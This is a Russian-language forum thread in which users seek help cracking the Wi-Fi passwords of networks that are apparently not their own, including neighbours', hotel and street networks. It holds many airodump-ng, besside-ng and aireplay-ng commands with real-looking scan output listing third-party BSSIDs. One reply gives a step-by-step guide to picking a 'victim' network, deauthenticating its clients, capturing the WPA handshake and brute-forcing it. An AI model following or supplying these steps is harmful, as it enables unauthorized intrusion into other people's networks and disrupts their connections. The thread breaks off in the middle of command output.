А что за софт для восстановления паролей? Пароль то при этом не поменяется? Можешь подробней? А то я профан, не могу найти ничего..( Пытался подключиться удаленно к своему 2ому компу в сетке...не даёт! В чем дело? Ввожу имя компьютера, но выдает ошибку(
Уже который день страдаю на хендшейками. Самая лакомая сетка и никак не хочет поддаваться. Роутер настроен провайдером, у нас есть такие "Метросеть", роутер обозван Metro-144, канал не стандартный стоит: 6ch. Так вот вопрос, может ли провайдер настроить так, чтобы не видны были подключенные к роутеру устройства? Уже второй день скан стоит на хендшейки, сначала вручную, теперь пробую minidwep, все бесполезно, как будто не одного устройства так и не подключено. Тут либо люди напрямую подключают комп к роутеру, либо что-то хитро настроено... upd: дождался я устройства, minidwep пытается снять хендейшк, но пока безрезультатно. Есть идеи ребят?
Добрый день. В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30. Прочитал статью по ссылке (тоже на этом форуме), и много других. Что я делал: - подключил WiFi адаптер Alfa AWUS036H. - переключил в режим мониторинга: Code: root@kali-Linux:~# airodump-ng mon0 CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira- 10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_ B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi 60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati 60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA 00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako 00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520 00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI 90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje 00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_ 00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9 C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN <leng - затем перещел к перехвату хендшейка (проблема сразу выявилась): на форуме Античат и на других всегда при взломе были определены клиенты (station), а у меня это не происходило вообще вот что у меня показывало: Code: root@kali-Linux:~# airodump-ng mon0 CH 5 ][ Elapsed: 1 min ][ 2015-05-11 20:49 ][ display sta only BSSID STATION PWR Rate Lost Frames Probe (not associated) 14:36:C6:AB:6C:94 -73 0 - 1 0 1 (not associated) 00:C0:CA:81:EC:0E 0 0 - 1 0 7 (not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 39 (not associated) 18:00:2D:8A:FE:6D -61 0 - 1 0 1 (not associated) 80:EA:96:C9:25:9B -65 0 - 1 0 14 (not associated) AC:7F:3E:6B:AA:7F -67 0 - 1 0 1 (not associated) 30:10:B3:A2:C9:73 -69 0 - 1 0 9 (not associated) 6C:B7:F4:AE:BC:42 -69 0 - 1 0 3 YOTA (not associated) A8:BB:CF:A9:90:D4 -73 0 - 1 0 1 (not associated) A8:BB:CF:C8:DB:F1 -73 0 - 1 0 1 (not associated) 00:21:63:80:CD:12 -73 0 - 1 0 1 (not associated) 80:56:F2:03:33:97 -71 0 - 1 38 4 (not associated) B0:10:41:02:4E:57 -75 0 - 1 0 1 Rooflux (not associated) F0:24:75:D4:91:DB -75 0 - 1 0 1 (not associated) B0:10:41:DD:97:92 -79 0 - 1 0 6 (not associated) 44:6D:57:BE:2D:4B -81 0 - 1 0 1 UPVEL UR-325BN (not associated) 6C:3E:6D:65:9C:CA -81 0 - 1 0 1 (not associated) BC:92:6B:1C:06:D3 -69 0 - 1 0 2 (not associated) BC:CF:CC:8E:95:44 -73 0 - 1 0 1 (not associated) 44:6D:57:3A:1E:B1 -69 0 - 1 0 1 asunto (not associated) C0:18:85:4D:22:53 -77 0 - 1 0 1 (not associated) C0:64:C6:4F:25:48 -75 0 - 1 0 1 (not associated) 90:48:9A:35:39:5F -73 0 - 1 0 3 (not associated) 54:EF:92:23:C7:30 -29 0 - 1 0 5 как видно в коде к любому клиенту пишет not associated. - С начало подумал, что для besside-ng все равно, но оказалось нет. Вот что я увидел: Code: root@kali-Linux:~# besside-ng mon0 [20:04:44] Let's ride [20:04:44] Resuming from besside.log [20:04:44] Appending to wpa.cap [20:04:44] Appending to wep.cap [20:04:44] Logging to besside.log [20:05:00] TO-OWN [nbn-78*, MGTS_GPON_9228*, Alatin_Home*, Kira-WiFi*, Sashko*, tax*, Rooflux_5*, UPVEL UR-325BN*, 2b4A9Z72*, dlink*, Ali-1*, ASUS*, Rooflux*, Anakonda38*, WL520GC_1q1J*, ASUS1*, internetanet*, Port Royal*, ahalaimahalai*, Archiv_guest*, Archiv*, ASUS*, MGTS_GPON_4889*, YOTA*, Mgts_75*, WirelessNet*, SPIDER MAN*, asunto*, homezone*, WirelessNet*, project*, TAGNANG*, mgts87*, INGERSOLL*, ZyXEL_KEENETIC_4G_FCD75C*, TP-LINK_D5AE8A*, mgts98*, MGTS_1232470*, Kanadci*] OWNED [] [20:05:03] Crappy connection - nbn-78 unreachable got 0/10 (100% loss) [-73 dbm] [20:05:07] Crappy connection - MGTS_GPON_9228 unreachable got 0/10 (100% loss) [-65 dbm] [20:05:08] Crappy connection - Alatin_Home unreachable got 1/10 (90% loss) [-69 dbm] [20:05:42] Crappy connection - Rooflux_5 unreachable got 2/10 (80% loss) [-73 dbm] [20:05:45] Crappy connection - UPVEL UR-325BN unreachable got 2/10 (80% loss) [-73 dbm] [20:06:09] Crappy connection - Ali-1 unreachable got 1/10 (90% loss) [-75 dbm] [20:07:02] Crappy connection - internetanet unreachable got 0/10 (100% loss) [-73 dbm] [20:07:14] Crappy connection - ahalaimahalai unreachable got 0/10 (100% loss) [-69 dbm] [20:08:39] Crappy connection - asunto unreachable got 0/10 (100% loss) [-75 dbm] [20:08:51] Crappy connection - WirelessNet unreachable got 0/10 (100% loss) [-83 dbm] [20:09:25] Crappy connection - INGERSOLL unreachable got 0/10 (100% loss) [-73 dbm] [20:09:56] Crappy connection - MGTS_1232470 unreachable got 0/10 (100% loss) [-73 dbm] [20:10:07] Crappy connection - 261fa8 unreachable got 0/10 (100% loss) [-75 dbm] [20:10:19] Crappy connection - MKNet unreachable got 0/10 (100% loss) [-71 dbm] [20:10:30] Crappy connection - Sakura unreachable got 0/10 (100% loss) [-79 dbm] [20:10:53] Crappy connection - Slon unreachable got 0/10 (100% loss) [-75 dbm] [20:10:56] Crappy connection - NETGEAR38 unreachable got 0/10 (100% loss) [-77 dbm] [20:10:57] Crappy connection - Homenet unreachable got 0/10 (100% loss) [-75 dbm] [20:11:01] Crappy connection - DIR-620 unreachable got 1/10 (90% loss) [-76 dbm] [20:11:24] Crappy connection - Proton Wi-Fi unreachable got 0/10 (100% loss) [-73 dbm] [20:11:27] Crappy connection - unreachable got 0/10 (100% loss) [-75 dbm] [20:11:28] Crappy connection - onlime-109 unreachable got 0/10 (100% loss) [-75 dbm] [20:11:32] Crappy connection - 14 unreachable got 0/10 (100% loss) [-69 dbm] С первого взгляда кажется, что все "ок", однако решил проверить качество пойманого хендшейка, перешел в папку wep.cap и wireshark пишет : Но всеже окрывает, и там ни чего нет, иногда есть но ни каких хендшейков, лишь информация о роутре и тому подобное. через aircrack-ng, но все равно ни чего не вышло: Code: root@kali-Linux:~# aircrack-ng /wep.cap Opening /wep.cap read(file header) failed: Success Read 0 packets. No networks found, exiting. Quitting aircrack-ng... - снова перешел к airodump-ng, попробовал: Code: root@kali-Linux:~# airodump-ng --bssid CC:5D:4E:DA:11:C8 -c1 -w hachthis mon0 CH 1 ][ Elapsed: 59 mins ][ 2015-05-11 20:02 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID CC:5D:4E:DA:11:C8 -60 0 5500 417 0 1 54e WPA2 CCMP PSK Sashko BSSID STATION PWR Rate Lost Frames Probe в этоже время пробовал откдючвть клиентов: Code: root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 mon0 21:08:34 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1 21:08:34 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch Please specify an ESSID (-e). root@kali-Linux:~# aireplay-ng --deauth 5 -a CC:5D:4E:DA:11:C8 -e Sashko mon0 21:08:41 Waiting for beacon frame (BSSID: CC:5D:4E:DA:11:C8) on channel -1 21:08:41 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch - снова ни чего не вышло, только других способов больше не знаю. В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ. Заранее благодарен.[/QUOTE][/QUOTE]
- а что ты там хотел увидеть? у тебя и нет точек с WEP шифрованием. - для перехвата в besside-ng точек с WPA надо хелп читать внимательно: To get WPA handshake from a specific target (channel and BSSID): # besside-ng -W -c 6 -b 00:00:11:22:33:44 mon0
Слишком громко сказал, не найду. Шел около BMW центра: Code: CH 2 ][ Elapsed: 1 min ][ 2015-05-12 13:44 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 02:B3:6E:F6:22:9E -1 3 0 0 6 11 OPN HP3420 60:A4:4C:F0:1B:18 -58 71 36 0 6 54e. WPA2 CCMP PSK WEYLAND -----> 1C:BD:B9:3E:1D:24 -58 132 116 0 1 54 . WEP WEP BMTWlan_1 10:FE:ED:36:F3:3E -66 93 0 0 6 54e. WPA2 CCMP PSK Belka -----> 00:1F:1F:C5:F5:58 -68 121 0 0 11 54e WEP WEP Digitus304 00:22:55:57:51:00 -65 85 114 0 7 54e. OPN bmstu_staff BC:F6:85:44:9B:CE -65 135 0 0 5 54e WPA CCMP PSK homeAL EC:43:F6:08:E0:7C -64 89 7 0 4 54e WPA2 CCMP PSK sen_shamon C0:4A:00:DF:4A:E6 -66 103 0 0 9 54e. WPA2 CCMP PSK s13195 B8:A3:86:14:13:F0 -66 126 0 0 2 54e WPA CCMP PSK instation 10:FE:ED:80:95:10 -66 9 0 0 8 54e. WPA2 CCMP PSK TP-LINK 1C:7E:E5:91:DB:4C -66 16 5 0 6 54e WPA CCMP PSK DIR-620 10:7B:EF:56:2B:BC -68 106 2 0 3 54e WEP WEP vpn9001 00:18:E7:E8:51:9B -69 25 0 0 9 54e. WPA2 CCMP PSK dlink 00:1E:E5:A0:27:B0 -67 53 56 1 6 54 WPA2 CCMP PSK Inet1125 00:1E:E5:A0:25:30 -69 88 72 0 11 54 WPA2 CCMP PSK Inet829 E0:CB:4E:0B:11:6F -68 57 3 0 6 54 WPA TKIP PSK Zahar 00:26:5A:18:D6:34 -68 48 0 0 12 54e. WPA2 TKIP PSK malahit_hall C0:4A:00:E4:E3:46 -68 22 1 0 4 54e WPA2 CCMP PSK MNE NE JALKO 40:4A:03:79:81:70 -68 33 0 0 10 54e WPA2 CCMP PSK ZyXEL_KEENETIC_798170 FC:F5:28:65:0C:96 -68 107 0 0 1 54 WPA2 CCMP PSK ROBOT 00:22:B0:40:16:67 -69 94 2 0 3 54 . WPA2 TKIP PSK 208 E0:CB:4E:FC:7D:D5 -69 77 6 0 11 54 WPA TKIP PSK wild 0E:18:D6:47:E9:E0 -71 8 0 0 6 54e. WPA2 CCMP PSK Hololab_guest 58:6D:8F:36:D7:5A -69 8 3 0 6 54e WPA2 CCMP PSK SkyNet 00:27:22:E8:1E:62 -69 4 0 0 1 54e. WPA TKIP PSK ubnt11951 CC:5D:4E:FD:34:C8 -69 5 0 0 6 54e WPA2 CCMP PSK TOLSTY 00:03:7F:FE:00:00 -69 211 2 0 3 54 WPA2 CCMP PSK ibm506 B8:A3:86:0B:BF:1A -69 29 0 0 9 54e WPA CCMP PSK METRO 12:18:D6:47:E9:E0 -70 10 0 0 6 54e. WPA2 CCMP PSK <length: 0> 6A:28:5D:67:19:E8 -69 28 0 0 1 54e WPA2 CCMP PSK Keenetic-2528 E8:94:F6:E5:89:9C -70 15 0 0 10 54e. WPA2 CCMP PSK The_SpeeRT 0A:18:D6:47:E9:E0 -70 6 0 0 6 54e. WPA2 CCMP MGT Hololab BC:F6:85:CA:33:D2 -71 53 0 0 11 54e WPA2 CCMP PSK DIR-615 34:08:04:13:0A:FE -73 2 0 0 11 54e WPA2 CCMP PSK Mixa83 28:28:5D:96:CA:24 -71 107 0 0 3 54e WPA2 CCMP PSK Keenetic-3064 90:4E:2B:E4:5B:48 -71 32 0 0 3 54e OPN HUAWEI-GLR29J BC:EE:7B:65:EF:64 -71 31 0 0 10 54e WPA TKIP PSK VPN7505 00:21:D8:93:DC:50 -71 7 0 0 8 54e. OPN bmstu_staff 10:FE:ED:82:24:1E -72 17 0 0 11 54e. WPA2 CCMP PSK TP-LINK_82241E C4:A8:1D:5B:BB:47 -71 25 0 0 1 54e WPA2 CCMP PSK Deonis2222 00:3A:9A:A5:6E:91 -73 10 0 0 11 54e. OPN bmstu_staff 00:3A:9A:A5:6E:99 -70 13 0 0 11 54e. OPN bmstu_guest 1C:7E:E5:E3:FA:52 -73 28 0 0 13 54e WPA2 TKIP PSK 72111 84:C9:B2:4C:DE:D5 -73 62 0 0 3 54e. WPA2 CCMP PSK s4929 B0:B2:DC:3E:65:4C -73 9 0 0 1 54e WPA2 CCMP PSK Army 28:28:5D:67:8D:34 -74 9 0 0 1 54e WPA2 CCMP PSK dimon0764 00:18:39:76:AA:CA -73 2 0 0 11 54 WPA TKIP PSK linksys 00:1E:E5:A0:27:20 -73 0 2 0 6 -1 WPA <length: 0> 90:94:E4:EF:32:38 -73 7 0 0 1 54e WPA2 CCMP PSK Kostik 40:4A:03:79:2F:95 -72 19 0 0 1 54e WPA2 CCMP PSK s10932 B0:B2:DC:5B:C7:C4 -73 16 1 0 1 54e WPA2 CCMP PSK SovAsQ AC:22:0B:7C:B9:38 -76 12 0 0 13 54e WPA2 CCMP PSK BURGUY 00:14:D1:E2:D2:2A -75 6 0 0 1 54 . WPA2 TKIP PSK Bardak EC:43:F6:E1:EE:BC -75 3 0 0 3 54e WPA2 CCMP PSK 119 40:4A:03:44:8A:BA -75 8 0 0 3 54 WPA TKIP PSK Pavel-PC 00:3A:9A:A5:6E:90 -75 1 0 0 11 54e. OPN bmstu_lb E8:DE:27:C2:EC:1E -72 5 0 0 9 54e. WPA2 CCMP PSK O13311 сразу 2 штуки нашел. Code: root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0 [13:57:01] Let's ride [13:57:01] Resuming from besside.log [13:57:01] Appending to wpa.cap [13:57:01] Appending to wep.cap [13:57:01] Logging to besside.log [13:57:01] Can't attack BMTWlan_1 [13:57:01] All neighbors owned Dying... [13:57:01] TO-OWN [] OWNED [] Почему-то не хочет.
- ну тут есть, а в верхнем скрине не было. - открывай besside.log и смотри что он тебе там наловил. - флаг -W только для WPA. - root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0 зачем ты для WEP даёшь флаг -W ? - для WPA запусти так просто может чё и словит: root@kali-Linux:~# besside-ng -W mon0
Наконец-то найшел долгожданного клиента: Code: CH 6 ][ Elapsed: 5 mins ][ 2015-05-12 14:28 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 60:A4:4C:F0:1B:18 -59 0 928 392 0 6 54e. WPA2 CCMP PSK WEYLAND BSSID STATION PWR Rate Lost Frames Probe 60:A4:4C:F0:1B:18 B4:52:7E:97:D3:F4 -65 0 - 1 0 9 Отключаю клиента от сети: Code: root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 mon0 14:26:59 Waiting for beacon frame (BSSID: 60:A4:4C:F0:1B:18) on channel -1 14:26:59 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 wlan0 ioctl(SIOCSIWMODE) failed: Device or resource busy ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211, ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run 'airmon-ng start wlan0 <#>' Sysfs injection support was not found either. но ни чего не смог -W что она делает? Конкретный роутер пробую ломануть : Code: root@kali-Linux:~# besside-ng -W -c 6 -b 60:A4:4C:F0:1B:18 mon0 [14:24:16] Let's ride [14:24:16] Resuming from besside.log [14:24:16] Appending to wpa.cap [14:24:16] Appending to wep.cap [14:24:16] Logging to besside.log [14:24:17] Got replayable packet for BMTWlan_1 [len 86] [14:30:29] Got replayable packet for [len 86] [14:35:00] - Attacking [WEYLAND] WPA - DEAUTH (know 2 clients) жду пока, может чо получится.
Здравствуйте все ! Задам риторический вопрос Windows 8.1 64 WiFi RTL 8812UA TP-Link очень долго при загрузке поднимается WIFI сетка, кто знает как ускорить этот процесс - загрузка драйвера и подъем соединения WiFi ! Конечно это тривиально, но может кто знает т.к. на устройстве нет проводной сети ! Спс.!
Добрый вечер. Во время перехвата хендшейка, появилась проблема: при отключении клиентов от сети (роутера) пишет: No such BSSID available. Вот что я делал: - нашел роутеров и клиентов Code: CH 7 ][ Elapsed: 8 s ][ 2015-05-12 20:27 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:31:52:24:62:5F -69 4 0 0 6 54e. WPA2 CCMP PSK cln_wifi_mgts 54:04:A6:5B:9D:94 -66 15 0 0 5 54e WPA2 CCMP PSK MosUrGarant B8:A3:86:6B:F5:CC -68 2 0 0 6 54e WPA2 CCMP PSK WE_ARE_HERE 1C:AF:F7:82:6A:62 -67 9 0 0 6 54 WPA2 TKIP PSK dlink BA:2B:C1:5A:15:A7 -1 4 0 0 10 54 OPN Portthru C4:6E:1F:A4:B6:C0 -57 18 0 0 3 54e. WPA CCMP PSK cosmos13287 64:70:02:A1:BA:AE -48 15 0 0 11 54e. WPA2 CCMP PSK TechNoServ C2:4A:00:7F:B2:6E -47 20 0 0 11 54 . WPA CCMP PSK <length: 0> C0:4A:00:7F:B2:6E -49 17 0 0 11 54e. WPA2 CCMP MGT TechnoServCORP E4:68:A3:10:04:DE -55 9 0 0 11 54e. WPA2 CCMP PSK MGTS_112 10:FE:ED:F6:52:31 -53 38 0 0 6 54e. WPA2 CCMP PSK PPRB Hotel 5 4E:5D:4E:4B:93:E8 -56 24 0 0 5 54e WPA2 CCMP PSK MosUrGarant 94:04:9C:62:D7:98 -59 12 0 0 11 54e WPA2 CCMP PSK MGTS 119 10:FE:ED:F6:47:EB -62 6 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4 4C:5E:0C:6A:E0:85 -47 10 0 0 4 54e. WPA2 CCMP PSK MKT-Wireless 4E:5D:4E:4B:93:E9 -55 25 0 0 5 54e WPA2 CCMP PSK MosUr E4:68:A3:10:0A:F6 -63 15 0 0 6 54e. WPA2 CCMP PSK mgts-115 7C:B7:33:25:7E:84 -65 4 1 0 6 54e WPA2 CCMP PSK AKADO-7E7E EC:43:F6:05:34:88 -65 4 0 0 2 54e WPA2 CCMP PSK ALGO_WIFI 08:60:6E:EF:1A:98 -62 17 1 0 11 54e WPA2 CCMP PSK Home126-2 C8:D3:A3:EC:95:5A -66 13 0 0 11 54e WPA CCMP PSK DSL-2740U F8:C0:91:13:B2:FF -67 10 0 0 8 54e WPA2 CCMP PSK onlime9 7C:B7:33:26:84:08 -66 3 1 0 1 54e WPA2 CCMP PSK AKADO-8402 E4:68:A3:0F:DC:98 -65 12 0 0 6 54e. WPA2 CCMP PSK mgts-111 60:33:4B:E3:54:C7 -65 7 0 0 7 54e. WPA2 CCMP PSK Apple Forevah Nah 00:27:22:E8:1E:3C -67 10 0 0 8 54e. WPA TKIP PSK UBNT10780 B8:BE:BF:EF:83:19 -69 3 0 0 1 54e. WPA2 CCMP PSK CLASS-211 1C:BD:B9:B2:43:02 -69 5 0 0 11 54e. WPA2 CCMP PSK dlink-dlink 00:17:31:1B:03:E2 -70 4 0 0 1 54 WPA TKIP PSK Tata-77 00:24:8C:A0:46:E5 -68 13 1 0 6 54 WPA TKIP PSK tsj 10:FE:ED:F6:4E:ED -72 2 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4 E0:CE:C3:C6:F5:C6 -73 2 1 0 8 54e WPA2 CCMP PSK AKADO-F5C0 BSSID STATION PWR Rate Lost Frames Probe BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 31 4 (not associated) 00:C0:CA:81:EC:0E -9 0 - 1 0 2 (not associated) AC:38:70:92:07:4D -65 0 - 1 0 1 (not associated) 00:18:DE:D0:BD:EA -69 0 - 1 17 7 Spacenet (not associated) F8:D1:11:08:31:51 -69 0 - 1 0 1 mgts-148 (not associated) 00:16:EB:1F:65:E4 -69 0 - 1 48 10 AKADO-24B8 (not associated) 84:7A:88:97:06:C8 -73 0 - 1 44 5 (not associated) 24:0A:64:74:54:53 -71 0 - 1 0 1 - выбрал нужный канал и BSSID Code: CH 10 ][ Elapsed: 38 mins ][ 2015-05-12 21:06 ][ fixed channel mon0: -1 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E BA:2B:C1:5A:15:A7 -1 0 2978 0 0 10 54 OPN P BSSID STATION PWR Rate Lost Frames Probe BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 0 2983 И самое интересное, пытаюсь отключить клиента ( со всех сайтов команды пробовал) : Code: root@kali-Linux:~# aireplay-ng -1 9999 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19) 21:08:43 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1 21:08:54 No such BSSID available. root@kali-Linux:~# aireplay-ng -1 6000 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0 No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19) 21:09:03 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1 21:09:13 No such BSSID available. root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0 No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19) 21:09:30 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1 21:09:40 No such BSSID available. root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0 No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19) 21:09:57 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1 21:10:07 No such BSSID available. root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -h 00:15:99:B0:75:A0 --ignore-negative-one mon0 The interface MAC (9C:AD:97:4D:37:19) doesn't match the specified MAC (-h). ifconfig mon0 hw ether 00:15:99:B0:75:A0 21:10:16 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1 21:10:26 No such BSSID available. Что я не пробовал резудьтат один. А ждать пока клиент сам оключится от сети, это может только завтра произойти. ------------------------------------------------------------------------------------------------------------------------------------------------------------ Плохой, конечно, пример выбрал, так как сеть эта открыта, но суть не в этом есть море примеров: Code: root@kali-Linux:~# aireplay-ng -1 9999 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB --ignore-negative-one mon0 No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19) 21:28:59 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1 21:29:09 No such BSSID available. Этот пример с закрытой сетью (WPA2).
1. Останавливаешь wifi адаптер командой: ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a) 2. Убиваешь мешающие процессы командой airmon-ng wlanX check kill 3. Запускаешь режим мониторинга airmon-ng start wlanX (появится адаптер mon0) 4. Далее смотришь не спеша по каналам выбирая жертву airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента) 5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename) 6. Одновременно не отключая аирдампа в соседней консоли даешь команду aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому. Ну вот вроде все разжевал. Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня: Code: root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one 21:39:31 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1 21:39:41 No such BSSID available. Только не понял: Как это не поднимать основной интерфейс
так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
Да верно, спасибо ошибка ушла: Code: CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 02:2F:0F:AE:44:A9 -1 0 9 0 0 10 11 OPN HP02ACAB BSSID STATION PWR Rate Lost Frames Probe 02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 13 9 А вот в отключенни ESSID все равно требует, и ошибка не ушла: Code: root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one 21:55:37 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10 21:55:47 No such BSSID available. Please specify an ESSID (-e). root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one 21:56:54 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10 21:57:04 No such BSSID available.
Интересно он в строке fixset channel вот что пишет: Code: CH 10 ][ Elapsed: 9 mins ][ 2015-05-12 22:07 ][ fixed channel mon0: 13 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 02:2F:0F:AE:44:A9 -1 0 3257 0 0 10 11 OPN HP02ACAB BSSID STATION PWR Rate Lost Frames Probe 02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -63 0 - 1 38 3257 С 1 по (примерно) 15 подбирает, я зафиксировал 13. Так и должно быть? WLAN0 отключен: Code: root@kali-Linux:~# ifconfig eth0 Link encap:Ethernet HWaddr 28:d2:44:a9:92:6c UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:112 errors:0 dropped:0 overruns:0 frame:0 TX packets:112 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:6720 (6.5 KiB) TX bytes:6720 (6.5 KiB) mon0 Link encap:UNSPEC HWaddr 9C-AD-97-4D-37-19-3A-30-00-00-00-00-00-00-00-00 UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1 RX packets:590118 errors:0 dropped:14140 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:122378467 (116.7 MiB) TX bytes:0 (0.0 B) usb0 Link encap:Ethernet HWaddr 36:4b:50:b7:ef:2d inet addr:192.168.0.182 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: 